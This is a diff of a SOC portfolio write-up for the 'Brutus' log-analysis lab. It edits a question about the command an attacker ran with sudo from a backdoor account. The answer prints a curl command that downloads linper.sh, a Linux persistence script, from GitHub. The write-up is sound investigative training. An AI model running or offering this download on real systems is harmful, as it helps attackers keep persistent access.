keval-sondigara/SOC-Analyst-Portfolio/Log_Analysis/Brutus/writeup.md

 ### Answer:- 2024-03-06 06:37:24

-### 8).The attacker logged into their backdoor account and utilized their higher privileges to download a script.
+### 7).The attacker logged into their backdoor account and utilized their higher privileges to download a script.
 What is the full command executed using sudo?

-As we saw early that attacker used linper.sh to utilize their higher privileges
+As we saw early that attacker used linper.sh to utilize their higher privileges.

 ### Answer:- /usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh